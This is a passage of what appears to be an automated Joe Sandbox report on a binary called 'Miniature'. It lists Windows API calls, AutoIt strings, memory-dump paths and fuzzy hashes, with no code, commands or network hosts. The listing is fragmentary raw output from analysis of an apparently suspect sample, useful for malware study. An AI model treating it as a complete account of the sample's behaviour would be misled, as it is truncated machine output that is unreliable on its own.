                                                  • Opcode Fuzzy Hash: 933582a3f0a542ee9c5e124eca37db317366bc26d94ca847c5582aae66d67eaf
                                                  • Instruction Fuzzy Hash: 59111E7204020DBFEF229F94DC88EEA7FADEB04354F148051FA5856164C7769D95DBA0
                                                  APIs
                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FB07EC
                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00FB07F4
                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FB07FF
                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FB080A
                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00FB0812
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FB081A
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Virtual
                                                  • String ID:
                                                  • API String ID: 4278518827-0
                                                  • Opcode ID: d6e6fea2ad82854be44a44ec2bffe5c8024418250402887d6f02632b90290142
                                                  • Instruction ID: b0ac8cb868ef23b381ae2c110ba93263f5f6d41bdaf42c80a1aa415d1dbf6529
                                                  • Opcode Fuzzy Hash: d6e6fea2ad82854be44a44ec2bffe5c8024418250402887d6f02632b90290142
                                                  • Instruction Fuzzy Hash: A5016CB09027597DE3108F5A8C85B52FFA8FF59354F10411BE15C47941C7F5A868CBE5
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00FF59B4
                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00FF59CA
                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00FF59D9
                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FF59E8
                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FF59F2
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FF59F9
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                  • String ID:
                                                  • API String ID: 839392675-0
                                                  • Opcode ID: 4c04cd76dfeadc5e55f34c2a2318f7df8018959d756f0fc695dd545f7230e225
                                                  • Instruction ID: dc7c77945e501e9a2e0e69c1d5de06d028a282ec4645fd5f459b5b8f7e4266b1
                                                  • Opcode Fuzzy Hash: 4c04cd76dfeadc5e55f34c2a2318f7df8018959d756f0fc695dd545f7230e225
                                                  • Instruction Fuzzy Hash: 4FF01D32641258BBE7315E929C0EEEF7A7CEFCAB21F200159FA4591048D7AA1A0187B5
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00FF77FE
                                                  • EnterCriticalSection.KERNEL32(?,?,00F9C2B6,?,?), ref: 00FF780F
                                                  • TerminateThread.KERNEL32(00000000,000001F6,?,00F9C2B6,?,?), ref: 00FF781C
                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00F9C2B6,?,?), ref: 00FF7829
                                                    • Part of subcall function 00FF71F0: CloseHandle.KERNEL32(00000000,?,00FF7836,?,00F9C2B6,?,?), ref: 00FF71FA
                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00FF783C
                                                  • LeaveCriticalSection.KERNEL32(?,?,00F9C2B6,?,?), ref: 00FF7843
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                  • String ID:
                                                  • API String ID: 3495660284-0
                                                  • Opcode ID: b06080bcc4453580b25b3fe95ff4a0912ec1e1fca00d65c2f4928477248f8d6e
                                                  • Instruction ID: ea58d167cce87be0e97a14efa2db7cc882e89f49dfef04ff9e7a7c7780e32c8b
                                                  • Opcode Fuzzy Hash: b06080bcc4453580b25b3fe95ff4a0912ec1e1fca00d65c2f4928477248f8d6e
                                                  • Instruction Fuzzy Hash: 39F03A32545312ABD7312F64EC8CAABB729BF4A312B341422F242950A88BBB5805DB60
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FE9555
                                                  • UnloadUserProfile.USERENV(?,?), ref: 00FE9561
                                                  • CloseHandle.KERNEL32(?), ref: 00FE956A
                                                  • CloseHandle.KERNEL32(?), ref: 00FE9572
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00FE957B
                                                  • HeapFree.KERNEL32(00000000), ref: 00FE9582
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                  • String ID:
                                                  • API String ID: 146765662-0
                                                  • Opcode ID: 2fe9a219bdf6bd4a358495a179859f0ebaf5df5a1b0a73e54a4eb0426bbdaacb
                                                  • Instruction ID: aad0946d50746885308663ad21d1439b64125b310ff3e6fd2d53a42fd1e496a0
                                                  • Opcode Fuzzy Hash: 2fe9a219bdf6bd4a358495a179859f0ebaf5df5a1b0a73e54a4eb0426bbdaacb
                                                  • Instruction Fuzzy Hash: DBE0C236004201BBDA211FE1EC0C95ABF29FB49722B608220F2559147CCB3B9460DB50
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 01008CFD
                                                  • CharUpperBuffW.USER32(?,?), ref: 01008E0C
                                                  • VariantClear.OLEAUT32(?), ref: 01008F84
                                                    • Part of subcall function 00FF7B1D: VariantInit.OLEAUT32(00000000), ref: 00FF7B5D
                                                    • Part of subcall function 00FF7B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00FF7B66
                                                    • Part of subcall function 00FF7B1D: VariantClear.OLEAUT32(00000000), ref: 00FF7B72
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                  • API String ID: 4237274167-1221869570
                                                  • Opcode ID: 8e1a2737d4d463fa19f874d0d18c14843653a96c20eeba446a74adf43295fd4d
                                                  • Instruction ID: 9c7047554abcb5fbc26514e2d4e47b26dc173e983300132bdf59f1668969afa0
                                                  • Opcode Fuzzy Hash: 8e1a2737d4d463fa19f874d0d18c14843653a96c20eeba446a74adf43295fd4d
                                                  • Instruction Fuzzy Hash: 52919170A083019FD711DF24C88095ABBF5FF99354F04896EF9858B3A1DB34E905CB52
                                                  APIs
                                                    • Part of subcall function 00FA436A: _wcscpy.LIBCMT ref: 00FA438D
                                                  • _memset.LIBCMT ref: 00FF332E
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FF335D
                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FF3410
                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00FF343E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                  • String ID: 0
                                                  • API String ID: 4152858687-4108050209
                                                  • Opcode ID: 8c1b2a767ed130c1c05002f4b06fe0f7fb77e41acc29c190bc89cb75f39fb500
                                                  • Instruction ID: 9c71731195dfc0cb1da99d7a2e3662666852e38ac456dd90465a02ad91c20267
                                                  • Opcode Fuzzy Hash: 8c1b2a767ed130c1c05002f4b06fe0f7fb77e41acc29c190bc89cb75f39fb500
                                                  • Instruction Fuzzy Hash: F851F131A083089BD725EE28C84567BB7E8AF45760F04062DFA95D31E1DB74DE44EB52
                                                  APIs
                                                  • _memset.LIBCMT ref: 00FF2F67
                                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00FF2F83
                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 00FF2FC9
                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01057890,00000000), ref: 00FF3012
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Menu$Delete$InfoItem_memset
                                                  • String ID: 0
                                                  • API String ID: 1173514356-4108050209
                                                  • Opcode ID: 5cc8d1360a372abb3b2f0fcea6d2a53122131d049f9e41b2a9bb9eb6395bd3f9
                                                  • Instruction ID: a97dfadae23482e39f6fa6ea50de9a4be3c7a32e1b234173f23496280f86383e
                                                  • Opcode Fuzzy Hash: 5cc8d1360a372abb3b2f0fcea6d2a53122131d049f9e41b2a9bb9eb6395bd3f9
                                                  • Instruction Fuzzy Hash: 7F4115716043459FD720DF24CC84B2ABBE4AF84324F10461EFAA5973E1DB74EA04DB52
                                                  APIs
                                                    • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
                                                    • Part of subcall function 00FEB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00FEB7BD
                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00FE9ACC
                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00FE9ADF
                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00FE9B0F
                                                    • Part of subcall function 00FA1821: _memmove.LIBCMT ref: 00FA185B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$_memmove$ClassName
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 365058703-1403004172
                                                  • Opcode ID: c62ad2dc6bcfdfcecb71293b70feda8adc2838c4338e2b64fb190fb18a6472bc
                                                  • Instruction ID: 6e6bbbac5e1e1c5bfa1b7e50ed75bd03fc208f6c970742fc2039c31176f00dcb
                                                  • Opcode Fuzzy Hash: c62ad2dc6bcfdfcecb71293b70feda8adc2838c4338e2b64fb190fb18a6472bc
                                                  • Instruction Fuzzy Hash: 6D2104B1A04104BEDB24EBA1DC85DFFB768EF86360F204129F865972D4DB7C0909A660
                                                  APIs
                                                    • Part of subcall function 00F92111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F9214F
                                                    • Part of subcall function 00F92111: GetStockObject.GDI32(00000011), ref: 00F92163
                                                    • Part of subcall function 00F92111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F9216D
                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 01016A86
                                                  • LoadLibraryW.KERNEL32(?), ref: 01016A8D
                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 01016AA2
                                                  • DestroyWindow.USER32(?), ref: 01016AAA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                  • String ID: SysAnimate32
                                                  • API String ID: 4146253029-1011021900
                                                  • Opcode ID: 1088bcd8297a5ed23a085272ae28f5ba9c6c93ead8a9e2c82676a92fb89f7616
                                                  • Instruction ID: e4431474729cd91868df0bea4e4b60d2af7efd2bb323d68ee496697876798335
                                                  • Opcode Fuzzy Hash: 1088bcd8297a5ed23a085272ae28f5ba9c6c93ead8a9e2c82676a92fb89f7616
                                                  • Instruction Fuzzy Hash: D721C972100205AFEF618E69DC40EBB77EDFF45324F908518FA9192189D3BBDC519B60
                                                  APIs
                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00FF7377
                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FF73AA
                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00FF73BC
                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00FF73F6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CreateHandle$FilePipe
                                                  • String ID: nul
                                                  • API String ID: 4209266947-2873401336
                                                  • Opcode ID: db4c2442a513fb840fd07549f8c86c98fd67d1bd9d77b616e363b40a4614cc50
                                                  • Instruction ID: 70cda382fbe0d5827be7a1b0ffaf98b245c0848216f6d31fd165f8a9a84414b8
                                                  • Opcode Fuzzy Hash: db4c2442a513fb840fd07549f8c86c98fd67d1bd9d77b616e363b40a4614cc50
                                                  • Instruction Fuzzy Hash: 0F21A97190830EABDB20AF65DC45AA9F7E4AF45730F204A19FEA0D72E4D771D850EB50
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00FF7444
                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FF7476
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00FF7487
                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00FF74C1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: CreateHandle$FilePipe
                                                  • String ID: nul
                                                  • API String ID: 4209266947-2873401336
                                                  • Opcode ID: 40e4d75e05b00691ec7b2571c2d2902cac79ad2370b25e2395699a47e67f4927
                                                  • Instruction ID: 6c355b664ecdcc9e9a6847361aca0ae2b41c5a05576d3ea70d1922da324a215d
                                                  • Opcode Fuzzy Hash: 40e4d75e05b00691ec7b2571c2d2902cac79ad2370b25e2395699a47e67f4927
                                                  • Instruction Fuzzy Hash: 0321A771908309DBDB20EF689C44AA9FBA8AF55730F200B19FAA0D72E0D7719854DB51
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00FFB297
                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00FFB2EB
                                                  • __swprintf.LIBCMT ref: 00FFB304
                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,01020980), ref: 00FFB342
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                  • String ID: %lu
                                                  • API String ID: 3164766367-685833217
                                                  • Opcode ID: 47801f05149e2e23f8a9e34b7f2f08a556453bf48d95901215718866c8f76c5a
                                                  • Instruction ID: a0a1269480012a04487e6c3ea37a81131f2ed174dcdc80d94b2625072b523488
                                                  • Opcode Fuzzy Hash: 47801f05149e2e23f8a9e34b7f2f08a556453bf48d95901215718866c8f76c5a
                                                  • Instruction Fuzzy Hash: BA218635A0020DAFCB20DF65CC45DAEB7B8EF89714B104069F905E7251DB35EE45DB61
                                                  APIs
                                                    • Part of subcall function 00FA1821: _memmove.LIBCMT ref: 00FA185B
                                                    • Part of subcall function 00FEAA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00FEAA6F
                                                    • Part of subcall function 00FEAA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FEAA82
                                                    • Part of subcall function 00FEAA52: GetCurrentThreadId.KERNEL32 ref: 00FEAA89
                                                    • Part of subcall function 00FEAA52: AttachThreadInput.USER32(00000000), ref: 00FEAA90
                                                  • GetFocus.USER32 ref: 00FEAC2A
                                                    • Part of subcall function 00FEAA9B: GetParent.USER32(?), ref: 00FEAAA9
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00FEAC73
                                                  • EnumChildWindows.USER32(?,00FEACEB), ref: 00FEAC9B
                                                  • __swprintf.LIBCMT ref: 00FEACB5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                  • String ID: %s%d
                                                  • API String ID: 1941087503-1110647743
                                                  • Opcode ID: 6e2be4592f9d07b2a2cd36ecc0cbba590a19cc0f9896b67c58c57aac74b20288
                                                  • Instruction ID: 99e8f7227430530a9857db15b53ffa7c05701f9764b811e1684bc5f6ee19f61a
                                                  • Opcode Fuzzy Hash: 6e2be4592f9d07b2a2cd36ecc0cbba590a19cc0f9896b67c58c57aac74b20288
                                                  • Instruction Fuzzy Hash: 3511E475600304ABCF21BFA1DD85FEA376CAB49710F104079FE18AA142CA79A945EB72
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 00FF2318
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                  • API String ID: 3964851224-769500911
                                                  • Opcode ID: 1d7ead0317c1ea84dc5501d0074cda1c35a5f8f8c4557274934739085b382e5d
                                                  • Instruction ID: 33e9e1e4734062dee5cea44e7d1142cdb87125158650821de70a5801f031ae91
                                                  • Opcode Fuzzy Hash: 1d7ead0317c1ea84dc5501d0074cda1c35a5f8f8c4557274934739085b382e5d
                                                  • Instruction Fuzzy Hash: AE1170B090012D9BCF00EFA4C8408FEB7B4FF1A304B508054D950572A1DF3A5D06DF50
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0100F2F0
                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0100F320
                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0100F453
                                                  • CloseHandle.KERNEL32(?), ref: 0100F4D4
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.2979760173.0000000000F91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00F90000, based on PE: true
                                                  • Associated: 0000000A.00000002.2979728446.0000000000F90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979835735.0000000001046000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979903816.0000000001050000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.2979931573.0000000001059000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_f90000_Miniature.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                  • String ID:
                                                  • API String ID: 2364364464-0
                                                  • Opcode ID: 26776109e58384df6053a677a56c21c1468a64fca9b88d9ef4d8a44a2fa84423
                                                  • Instruction ID: ecd27cf4dbe8c29b8d29c22229ceb41e09e11b101fc8a60d059b0278c4ed7123
                                                  • Opcode Fuzzy Hash: 26776109e58384df6053a677a56c21c1468a64fca9b88d9ef4d8a44a2fa84423
                                                  • Instruction Fuzzy Hash: 8E81B2716003019FEB21EF28DC82F2EB7E5AF54B14F14885DF999DB2D2DB74A8019B91
                                                  APIs
                                                    • Part of subcall function 00FA1A36: _memmove.LIBCMT ref: 00FA1A77
